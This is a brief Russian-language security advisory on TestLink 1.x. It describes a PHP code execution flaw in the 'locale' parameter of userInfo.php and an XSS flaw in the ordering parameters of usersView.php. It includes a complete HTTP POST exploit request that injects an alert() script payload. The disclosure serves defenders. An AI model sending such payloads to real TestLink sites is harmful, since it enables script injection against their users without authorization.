Программа: TestLink 1.x

Уязвимость позволяет удаленному пользователю осуществить XSS атаку и
выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "locale" сценарием lib/usermanagement/userInfo.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение
опции "register_globals" в конфигурационном файле PHP.

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "order_by_role_dir", "order_by_login_dir", и "user_order_by"
сценарием lib/usermanagement/usersView.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

   POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
   Accept: */*
   Content-Type: application/x-www-form-urlencoded
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
   Host: x.x.x.x
   Content-Length: 146
   Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381

   Connection: Close
   Pragma: no-cache
   operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1> ">alert(726367128870)%3B&user_order_by=order_by_login



Оставить мнение